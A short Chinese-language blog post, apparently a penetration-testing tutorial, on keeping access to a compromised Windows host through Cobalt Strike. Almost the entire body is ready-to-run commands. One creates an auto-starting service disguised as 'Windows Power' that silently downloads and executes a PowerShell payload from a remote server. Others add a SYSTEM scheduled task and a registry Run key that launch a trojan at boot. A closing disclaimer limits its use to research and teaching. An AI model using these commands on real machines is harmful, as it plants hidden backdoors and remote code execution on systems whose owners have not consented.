前言
- Cobalt Strike的基础使用
一、服务器自启动配置
1、创建服务
1 |
shell sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.43.22:80/a'))\"" |
2、设置服务会自动启动
1 |
shell sc config "Windows Power" start= auto |
会被防火墙拦截,也可以换个木马执行
二、计划任务
1、创建任务
1 |
shell schtasks /create /tn "windowsup" /tr "C:\artifact.exe" /ru SYSTEM /sc onstart |
2、修改字符集和查询
1 |
chcp 437 |
3、启动
1 |
shell schtasks /run /tn windowsup |
4、删除计划
1 |
shell schtasks /delete /tn windowsup |
三、注册表启动
系统启动时,就会执行木马
1 |
shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\artifact.exe" /f |
我的个人博客
孤桜懶契:http://gylq.gitee.io
FROM:gylq.gitee Author:孤桜懶契
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论